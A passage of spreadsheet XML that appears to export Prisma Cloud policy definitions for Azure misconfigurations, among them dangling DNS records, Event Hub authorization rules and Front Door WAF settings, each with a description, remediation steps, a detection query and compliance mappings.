      <c r="AD2261" t="b">
        <v>1</v>
      </c>
      <c r="AE2261" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2261" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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1" t="inlineStr">
        <is>
          <t>9ff0cb83-da37-40fb-8ba5-011d104393b4</t>
        </is>
      </c>
      <c r="AI2261" t="inlineStr">
        <is>
          <t>9ff0cb83-da37-40fb-8ba5-011d104393b4</t>
        </is>
      </c>
      <c r="AJ2261" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2261" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2262">
      <c r="A2262" t="inlineStr">
        <is>
          <t>NIST 800-53 Rev 5, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2262" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2262" s="2" t="inlineStr"/>
      <c r="D2262" t="inlineStr"/>
      <c r="E2262" t="inlineStr"/>
      <c r="F2262" t="inlineStr"/>
      <c r="G2262" t="b">
        <v>1</v>
      </c>
      <c r="H22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62" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2262" t="inlineStr">
        <is>
          <t>azure-dns-recordsets</t>
        </is>
      </c>
      <c r="K2262" t="inlineStr">
        <is>
          <t>Azure DNS Zone having dangling DNS Record vulnerable to subdomain takeover associated with Azure Storage account blob</t>
        </is>
      </c>
      <c r="L2262" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2262" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2262" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2262" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2262" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2262" t="inlineStr">
        <is>
          <t>NS</t>
        </is>
      </c>
      <c r="R2262" t="inlineStr">
        <is>
          <t>NS-10</t>
        </is>
      </c>
      <c r="S2262" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2262" t="b">
        <v>0</v>
      </c>
      <c r="U2262" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2262" t="inlineStr">
        <is>
          <t>azure-dns-recordsets</t>
        </is>
      </c>
      <c r="W2262" t="inlineStr">
        <is>
          <t>This policy identifies DNS records within an Azure DNS zone that point to Azure Storage Account blobs that no longer exist.
A dangling DNS attack happens when a DNS record points to a cloud resource that has been deleted or is inactive, making the subdomain vulnerable to takeover. An attacker can exploit this by creating a new resource with the same name and taking control of the subdomain to serve malicious content. This allows attackers to host harmful content under your subdomain, which could lead to phishing attacks, data breaches, and damage to your reputation. The risk arises because the DNS record still references a non-existent resource, which unauthorized individuals can re-associate with their own resources.
As a security best practice, it is recommended to routinely audit DNS zones and remove or update DNS records pointing to non-existing Azure Storage Account blobs.</t>
        </is>
      </c>
      <c r="X2262" t="inlineStr">
        <is>
          <t>1. Log in to the Azure Portal and search for 'DNS zones'
2. Select 'DNS zones' from the search results
3. Select the DNS zone associated with the reported DNS record
4. On the left-hand menu, under 'DNS Management,' select 'Recordsets'
5. Locate and select the reported DNS record
6. Update or remove the DNS Record if no longer necessary</t>
        </is>
      </c>
      <c r="Y2262" t="inlineStr"/>
      <c r="Z2262" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-dns-recordsets' AND json.rule = type contains CNAME and properties.CNAMERecord.cname contains "web.core.windows.net" as X; config from cloud.resource where api.name = 'azure-storage-account-list' AND json.rule = properties.provisioningState equal ignore case Succeeded and properties.primaryEndpoints.web exists as Y; filter 'not ($.Y.properties.primaryEndpoints.web contains $.X.properties.CNAMERecord.cname) '; show X;</t>
        </is>
      </c>
      <c r="AA2262" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2262" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2262" t="inlineStr">
        <is>
          <t>PC-AZR-DNS-1286</t>
        </is>
      </c>
      <c r="AD2262" t="b">
        <v>1</v>
      </c>
      <c r="AE2262" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2262" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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62" t="inlineStr">
        <is>
          <t>4fb392da-719b-4061-b413-722a5eb902d4</t>
        </is>
      </c>
      <c r="AI2262" t="inlineStr">
        <is>
          <t>5370349b-9e06-4455-aaf9-98f0702a54ba</t>
        </is>
      </c>
      <c r="AJ2262" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2262" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2263">
      <c r="A2263" t="inlineStr">
        <is>
          <t>NIST 800-53 Rev 5, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2263" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2263" s="2" t="inlineStr"/>
      <c r="D2263" t="inlineStr"/>
      <c r="E2263" t="inlineStr"/>
      <c r="F2263" t="inlineStr"/>
      <c r="G2263" t="b">
        <v>0</v>
      </c>
      <c r="H226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63" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2263" t="inlineStr">
        <is>
          <t>azure-dns-recordsets</t>
        </is>
      </c>
      <c r="K2263" t="inlineStr">
        <is>
          <t>Azure DNS Zone having dangling DNS Record vulnerable to subdomain takeover associated with Web App Service</t>
        </is>
      </c>
      <c r="L2263" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2263" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2263" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2263" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2263" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2263" t="inlineStr">
        <is>
          <t>NS</t>
        </is>
      </c>
      <c r="R2263" t="inlineStr">
        <is>
          <t>NS-10</t>
        </is>
      </c>
      <c r="S2263" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2263" t="b">
        <v>0</v>
      </c>
      <c r="U2263" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2263" t="inlineStr">
        <is>
          <t>azure-dns-recordsets</t>
        </is>
      </c>
      <c r="W2263" t="inlineStr">
        <is>
          <t>This policy identifies DNS records within an Azure DNS zone that point to Azure Web App Services that no longer exist.
A dangling DNS attack happens when a DNS record points to a cloud resource that has been deleted or is inactive, making the subdomain vulnerable to takeover. An attacker can exploit this by creating a new resource with the same name and taking control of the subdomain to serve malicious content. This allows attackers to host harmful content under your subdomain, which could lead to phishing attacks, data breaches, and damage to your reputation. The risk arises because the DNS record still references a non-existent resource, which unauthorized individuals can re-associate with their own resources.
As a security best practice, it is recommended to routinely audit DNS zones and remove or update DNS records pointing to non-existing Web App Services.</t>
        </is>
      </c>
      <c r="X2263" t="inlineStr">
        <is>
          <t>1. Log in to the Azure Portal and search for 'DNS zones'
2. Select 'DNS zones' from the search results
3. Select the DNS zone associated with the reported DNS record
4. On the left-hand menu, under 'DNS Management,' select 'Recordsets'
5. Locate and select the reported DNS record
6. Update or remove the DNS Record if no longer necessary</t>
        </is>
      </c>
      <c r="Y2263" t="inlineStr"/>
      <c r="Z2263" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-dns-recordsets' AND json.rule = type contains CNAME and properties.CNAMERecord.cname contains "azurewebsites.net" as X; config from cloud.resource where api.name = 'azure-app-service' as Y; filter 'not ($.Y.properties.hostNames contains $.X.properties.CNAMERecord.cname) '; show X;</t>
        </is>
      </c>
      <c r="AA2263" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB2263" t="inlineStr">
        <is>
          <t>2024-11-13 23:45:56</t>
        </is>
      </c>
      <c r="AC2263" t="inlineStr">
        <is>
          <t>PC-AZR-DNS-1285</t>
        </is>
      </c>
      <c r="AD2263" t="b">
        <v>1</v>
      </c>
      <c r="AE2263" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2263" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG226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63" t="inlineStr">
        <is>
          <t>ffc82b2c-eb2d-455e-a460-4f226aff4506</t>
        </is>
      </c>
      <c r="AI2263" t="inlineStr">
        <is>
          <t>39e7ec57-727a-467e-b5d7-d0d20e28e2b7</t>
        </is>
      </c>
      <c r="AJ2263" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2263" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2264">
      <c r="A2264" t="inlineStr">
        <is>
          <t>TX-RAMP Level 2, ITSG-33, HITRUST CSF v.11.2.0</t>
        </is>
      </c>
      <c r="B2264" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2264" s="2" t="inlineStr"/>
      <c r="D2264" t="inlineStr"/>
      <c r="E2264" t="inlineStr"/>
      <c r="F2264" t="inlineStr"/>
      <c r="G2264" t="b">
        <v>1</v>
      </c>
      <c r="H22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64" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2264" t="inlineStr">
        <is>
          <t>azure-event-hub</t>
        </is>
      </c>
      <c r="K2264" t="inlineStr">
        <is>
          <t>Azure Event Hub Namespace having authorization rules except RootManageSharedAccessKey</t>
        </is>
      </c>
      <c r="L2264" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2264" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2264" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2264" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2264" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2264" t="inlineStr">
        <is>
          <t>Control Category: 11.0</t>
        </is>
      </c>
      <c r="R2264" t="inlineStr">
        <is>
          <t>11.a - Reporting Information Security Events</t>
        </is>
      </c>
      <c r="S2264" t="inlineStr"/>
      <c r="T2264" t="b">
        <v>0</v>
      </c>
      <c r="U2264" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2264" t="inlineStr">
        <is>
          <t>azure-event-hub-namespace</t>
        </is>
      </c>
      <c r="W2264" t="inlineStr">
        <is>
          <t>This policy identifies Azure Event Hub Namespaces which have authorization rules except RootManageSharedAccessKey.
Having Azure Event Hub namespace authorization rules other than 'RootManageSharedAccessKey' could provide access to all queues and topics under the namespace which pose a risk if these additional rules are not properly managed or secured.
As best practice, it is recommended to remove Event Hub namespace authorization rules other than RootManageSharedAccessKey and create access policies at the entity level, which provide access to only that specific entity for queues and topics.</t>
        </is>
      </c>
      <c r="X2264" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Navigate to 'Event Hubs' dashboard
3. Select the reported Event Hubs Namespace
4. Select 'Shared access policies' under 'Settings' section
5. Delete all other Shared access policy rules except 'RootManageSharedAccessKey'.</t>
        </is>
      </c>
      <c r="Y2264" t="inlineStr"/>
      <c r="Z2264" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-event-hub-namespace' AND json.rule = authorizationRules[*].name exists and authorizationRules[?any(name does not equal RootManageSharedAccessKey)] exists</t>
        </is>
      </c>
      <c r="AA2264" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2264" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2264" t="inlineStr">
        <is>
          <t>PC-AZR-EVH-1265</t>
        </is>
      </c>
      <c r="AD2264" t="b">
        <v>1</v>
      </c>
      <c r="AE2264" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2264" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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64" t="inlineStr">
        <is>
          <t>1926e46b-1ebf-4e7c-a202-aa3883731197</t>
        </is>
      </c>
      <c r="AI2264" t="inlineStr">
        <is>
          <t>67695e82-c014-46dd-bdb2-2084e60d5b51</t>
        </is>
      </c>
      <c r="AJ2264" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2264" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2265">
      <c r="A2265" t="inlineStr">
        <is>
          <t>ITSG-33, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 2, NYDFS 23 CRR-NY 500.0, ITSG-33, HITRUST CSF v.11.2.0</t>
        </is>
      </c>
      <c r="B2265" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2265" s="2" t="inlineStr"/>
      <c r="D2265" t="inlineStr"/>
      <c r="E2265" t="inlineStr"/>
      <c r="F2265" t="inlineStr"/>
      <c r="G2265" t="b">
        <v>1</v>
      </c>
      <c r="H226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65" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2265" t="inlineStr">
        <is>
          <t>azure-event-hub</t>
        </is>
      </c>
      <c r="K2265" t="inlineStr">
        <is>
          <t>Azure Event Hub Instance not defined with authorization rule</t>
        </is>
      </c>
      <c r="L2265" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2265" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2265" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2265" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2265" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2265" t="inlineStr">
        <is>
          <t>Control Category: 11.0</t>
        </is>
      </c>
      <c r="R2265" t="inlineStr">
        <is>
          <t>11.a - Reporting Information Security Events</t>
        </is>
      </c>
      <c r="S2265" t="inlineStr"/>
      <c r="T2265" t="b">
        <v>0</v>
      </c>
      <c r="U2265" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2265" t="inlineStr">
        <is>
          <t>azure-event-hub-namespace</t>
        </is>
      </c>
      <c r="W2265" t="inlineStr">
        <is>
          <t>This policy identifies Azure Event Hub Instances that are not defined with authorization rules.
If the Azure Event Hub Instance authorization rule is not defined, there is a heightened risk of unauthorized access to the event hub data and resources. This could potentially lead to unauthorized data retrieval, tampering, or disruption of the event hub operations. Defining proper authorization rules helps mitigate these risks by controlling and restricting access to the event hub resources.
As a best practice, it is recommended to define the least privilege security model access policies at Event Hub Instance.</t>
        </is>
      </c>
      <c r="X2265" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Navigate to 'Event Hubs'
3. Select the Event Hubs Namespace from the list which has the reported Event Hub instance.
4. Click on 'Event Hubs' under 'Entities' section
5. Click on the reported Event Hub instance
6. Select 'Shared access policies' under 'Settings' section
7. Click on '+Add'
8. Enter 'Policy name' and the required access
9. Click on 'Create'</t>
        </is>
      </c>
      <c r="Y2265" t="inlineStr"/>
      <c r="Z2265" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-event-hub-namespace' AND json.rule = properties.disableLocalAuth is false as X; config from cloud.resource where api.name = 'azure-event-hub' AND json.rule = properties.status equal ignore case ACTIVE and authorizationRules[*] is empty as Y; filter '$.Y.id contains $.X.name'; show Y;</t>
        </is>
      </c>
      <c r="AA2265" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2265" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2265" t="inlineStr">
        <is>
          <t>PC-AZR-EVH-1264</t>
        </is>
      </c>
      <c r="AD2265" t="b">
        <v>1</v>
      </c>
      <c r="AE2265" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2265" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG226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65" t="inlineStr">
        <is>
          <t>c7880add-1202-45f0-98e6-dd98a65ef98a</t>
        </is>
      </c>
      <c r="AI2265" t="inlineStr">
        <is>
          <t>a3a69677-af87-4b8f-9497-a70e2eb54373</t>
        </is>
      </c>
      <c r="AJ2265" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2265" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2266">
      <c r="A2266" t="inlineStr">
        <is>
          <t>CIS Controls v8, kfirdaus AWS Account-CS, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, ISO 27002:2022, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ISO/IEC 27001:2022, PCI DSS v4.0, ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, kfirdaus AWS Account-CS, ACSC Information Security Manual (ISM), PCI DSS v4.0, PCI DSS v4.0, CIS Controls v8.1, kashan ACSC Information Security Manual (ISM), MLPS 2.0 (Level 2), ISO 27002:2022, NIST 800-53 Rev 5, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Secure Controls Framework (SCF) - 2022.2.1, Secure Controls Framework (SCF) - 2024.2, Copy of ACSC Information Security Manual (ISM)-clone, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v7.1, Australian Energy Sector Cyber Security Framework (AESCSF), kfirdaus AWS Account-CS, kashan ACSC Information Security Manual (ISM), Copy of CIS Controls v8, ACSC Information Security Manual (ISM), kashan ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), CRI Profile v2.0</t>
        </is>
      </c>
      <c r="B2266" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2266" s="2" t="inlineStr"/>
      <c r="D2266" t="inlineStr"/>
      <c r="E2266" t="inlineStr"/>
      <c r="F2266" t="inlineStr"/>
      <c r="G2266" t="b">
        <v>1</v>
      </c>
      <c r="H22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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2266" t="inlineStr">
        <is>
          <t>azure-frontdoor</t>
        </is>
      </c>
      <c r="K2266" t="inlineStr">
        <is>
          <t>Azure Front Door does not have the Azure Web application firewall (WAF) enabled</t>
        </is>
      </c>
      <c r="L2266" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2266" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2266" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2266" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2266" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2266" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2266" t="inlineStr">
        <is>
          <t>ISM-1030</t>
        </is>
      </c>
      <c r="S2266" t="inlineStr"/>
      <c r="T2266" t="b">
        <v>0</v>
      </c>
      <c r="U2266" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2266" t="inlineStr">
        <is>
          <t>azure-frontdoor</t>
        </is>
      </c>
      <c r="W2266" t="inlineStr">
        <is>
          <t>This policy identifies Azure Front Doors which do not have the Azure Web application firewall (WAF) enabled. As a best practice, configure the Azure WAF service on the Front Doors to protect against application-layer attacks. To block malicious requests to your Front Doors, define the block criteria in the WAF rules.</t>
        </is>
      </c>
      <c r="X2266" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Select 'All services' &gt; 'Front Doors'
3. Click on the reported Front Door
4. Click on the 'Web application firewall' from the left panel
5. Select the frontend to attach WAF policy and Click on 'Apply Policy'
6. In 'Associate a Waf policy' dialog, select appropriate enabled WAF policy from the 'Policy' dropdown.
7. Click on 'Add' 
8. Click on 'Save' to save your changes 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-front-door-enables-waf
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-that-azure-front-door-enables-waf</t>
        </is>
      </c>
      <c r="Y2266" t="inlineStr"/>
      <c r="Z2266" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-frontdoor' AND json.rule = properties.provisioningState equals Succeeded as X; config from cloud.resource where api.name = 'azure-frontdoor-waf-policy' as Y; filter '$.X.properties.frontendEndpoints[*].properties.webApplicationFirewallPolicyLink.id does not exist or ($.X.properties.frontendEndpoints[*].properties.webApplicationFirewallPolicyLink.id equal ignore case $.Y.id and $.Y.properties.policySettings.enabledState equals Disabled)'; show X;
{"category":"Networking","resourceTypes":["azurerm_frontdoor"]}</t>
        </is>
      </c>
      <c r="AA2266" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2266" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2266" t="inlineStr">
        <is>
          <t>PC-AZR-AFD-829-CKV_AZURE_121</t>
        </is>
      </c>
      <c r="AD2266" t="b">
        <v>1</v>
      </c>
      <c r="AE2266" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2266" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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6" t="inlineStr">
        <is>
          <t>5ef0bea5-11c9-497d-9637-4a430368c754</t>
        </is>
      </c>
      <c r="AI2266" t="inlineStr">
        <is>
          <t>79734546-c8e7-45f3-a350-f14ad01fdda6</t>
        </is>
      </c>
      <c r="AJ2266" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2266" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2267">
      <c r="A2267" t="inlineStr">
        <is>
          <t>CIS Controls v8, kfirdaus AWS Account-CS, GDPR, NIST CSF v2.0, NYDFS 23 CRR-NY 500.0, Copy of ACSC Information Security Manual (ISM)-clone, ISO 27002:2022, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, Microsoft Cloud Security Benchmark v1, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, ISO/IEC 27001:2022, PCI DSS v4.0, ACSC Information Security Manual (ISM), NYDFS 23 CRR-NY 500.0, ISO/IEC 27001:2022, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, kfirdaus AWS Account-CS, ACSC Information Security Manual (ISM), NIST 800-53 Rev 5, PCI DSS v4.0, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, NIST SP 800-171 Revision 3, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, PCI DSS v4.0, Insurance Regulatory And Development Authority Of India, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS Controls v8.1, ITSG-33, kashan ACSC Information Security Manual (ISM), MLPS 2.0 (Level 2), Microsoft Cloud Security Benchmark v1, ISO 27002:2022, TX-RAMP Level 2, NIST 800-53 Rev 5, NIST CSF v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Secure Controls Framework (SCF) - 2022.2.1, Secure Controls Framework (SCF) - 2024.2, CRI Profile v2.0, Copy of ACSC Information Security Manual (ISM)-clone, Copy of ACSC Information Security Manual (ISM)-clone, NIST CSF v2.0, CIS Controls v7.1, Australian Energy Sector Cyber Security Framework (AESCSF), kfirdaus AWS Account-CS, kashan ACSC Information Security Manual (ISM), TX-RAMP Level 1, NYDFS 23 CRR-NY 500.0, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Copy of CIS Controls v8, ACSC Information Security Manual (ISM), kashan ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), DORA, Secure Controls Framework (SCF) - 2024.2, CRI Profile v2.0</t>
        </is>
      </c>
      <c r="B2267" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2267" s="2" t="inlineStr"/>
      <c r="D2267" t="inlineStr"/>
      <c r="E2267" t="inlineStr"/>
      <c r="F2267" t="inlineStr"/>
      <c r="G2267" t="b">
        <v>1</v>
      </c>
      <c r="H22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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2267" t="inlineStr">
        <is>
          <t>azure-frontdoor-waf</t>
        </is>
      </c>
      <c r="K2267" t="inlineStr">
        <is>
          <t>Azure Front Door Web application firewall (WAF) policy rule for Remote Command Execution is disabled</t>
        </is>
      </c>
      <c r="L2267" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2267" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2267" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2267" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2267" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2267" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2267" t="inlineStr">
        <is>
          <t>ISM-1030</t>
        </is>
      </c>
      <c r="S2267" t="inlineStr"/>
      <c r="T2267" t="b">
        <v>0</v>
      </c>
      <c r="U2267" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2267" t="inlineStr">
        <is>
          <t>azure-frontdoor-waf-policy</t>
        </is>
      </c>
      <c r="W2267" t="inlineStr">
        <is>
          <t>This policy identifies Azure Front Door Web application firewall (WAF) policies that have the Remote Command Execution rule disabled. It is recommended to define the criteria in the WAF policy with the rule ‘Remote Command Execution (944240)’ under managed rules to help in detecting and mitigating Log4j vulnerability. 
For details:
https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/</t>
        </is>
      </c>
      <c r="X2267" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Select 'All services' &gt; 'Web Application Firewall policies (WAF)'
3. Click on the reported Web Application Firewall policies (WAF) policy
4. Click on the 'Managed rules' from the left panel
5. Search '944240' rule from search bar and Select rule
6. Click on the 'Enable' to enable rule 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-front-door-waf-prevents-message-lookup-in-log4j2
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/ensure-front-door-waf-prevents-message-lookup-in-log4j2</t>
        </is>
      </c>
      <c r="Y2267" t="inlineStr"/>
      <c r="Z2267" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-frontdoor-waf-policy' AND json.rule = properties.policySettings.enabledState equals Enabled and properties.managedRules.managedRuleSets is not empty and properties.managedRules.managedRuleSets[*].ruleGroupOverrides[*].rules[?any(action equals Block and ruleId equals 944240 and enabledState equals Disabled)] exists as X; config from cloud.resource where api.name = 'azure-frontdoor' AND json.rule = properties.frontendEndpoints[*].properties.webApplicationFirewallPolicyLink exists and properties.provisioningState equals Succeeded as Y; filter '$.Y.properties.frontendEndpoints[*].properties.webApplicationFirewallPolicyLink.id contains $.X.name'; show X;
{"category":"Networking","resourceTypes":["azurerm_frontdoor_firewall_policy"]}</t>
        </is>
      </c>
      <c r="AA2267" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2267" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2267" t="inlineStr">
        <is>
          <t>PC-AZR-AWF-830-CKV_AZURE_133</t>
        </is>
      </c>
      <c r="AD2267" t="b">
        <v>1</v>
      </c>
      <c r="AE2267" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2267" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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7" t="inlineStr">
        <is>
          <t>17b5c119-cfce-482b-8c72-ead2bc5e333f</t>
        </is>
      </c>
      <c r="AI2267" t="inlineStr">
        <is>
          <t>69286a40-1d8c-4f64-a59a-129b38018d58</t>
        </is>
      </c>
      <c r="AJ2267" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2267" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2268">
      <c r="A2268" t="inlineStr">
        <is>
          <t>dluzardo standard</t>
        </is>
      </c>
      <c r="B2268" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2268" s="2" t="inlineStr"/>
